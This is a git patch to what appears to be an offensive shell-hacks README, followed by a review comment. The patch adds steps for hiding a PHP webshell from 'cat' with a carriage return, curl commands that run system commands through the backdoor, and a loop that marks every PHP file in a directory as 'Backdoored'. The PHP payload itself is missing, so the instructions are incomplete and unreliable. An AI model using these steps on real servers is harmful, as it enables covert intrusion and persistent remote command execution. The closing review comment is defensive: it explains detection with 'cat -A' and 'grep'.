From 4e203585176cdc4a3706eaeffb32cc662d72fe66 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 16 May 2023 18:59:04 +0100 Subject: [PATCH] Update README.md --- README.md | 26 +++++++++++++++++++++++--- 1 file changed, 23 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 826c949..e42deb9 100644 --- a/README.md +++ b/README.md @@ -1040,10 +1040,30 @@ Other methods: Hide from `cat` with a [simple carriage return](https://www.hahwul.com/2019/01/23/php-hidden-webshell-with-carriage/): ```sh -echo -e "\r" > /var/www/html/test.php -### -curl http://192.168.0.1/test.php -d 1="id; uname -mrs" +### The first line will be hidden from cat +cd /var/www/html +echo ''$'\r''' >test.php ``` +Note the `$'\r'`: It will move the cursor back and then overwrite with the following line. + +Test the backdoor: +```sh +### 1. Optional: Start a test PHP server +cd /var/www/html && php -S 127.0.0.1:8080 +### Without executing a command +curl http://127.0.0.1:8080/test.php +### With executing a command +curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id" +``` +Alternatively add ```` to the beginning of any existing PHP page: + +```sh +for f in *.php; do + sed -i '1s/^/\r/' "$f" + echo "Backdoored: '$f'" +done +``` + --- ## 7. Shell Hacks
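Review bot: The added sentence "Note the `$'\r'`: It will move the cursor back and then overwrite with the following line" reads as if the first line were gone, but the carriage return only changes how a terminal draws plain `cat` output; the bytes are still in `test.php`. Suggest qualifying the sentence and the comment "The first line will be hidden from cat" accordingly, for example by stating that `cat -A test.php` (or `cat -v`) prints the carriage return as `^M` with the whole first line visible, and that editors, `less` and file-integrity checks are unaffected. The same applies to the `sed -i '1s/^/\r/' "$f"` loop at the end of the hunk: every file it touches gains a carriage return on line 1 and a new modification time, so a search such as `grep -l $'\r' *.php` lists the modified files (CRLF-encoded files will also match). A README line saying so would keep readers from treating this as more than a display trick.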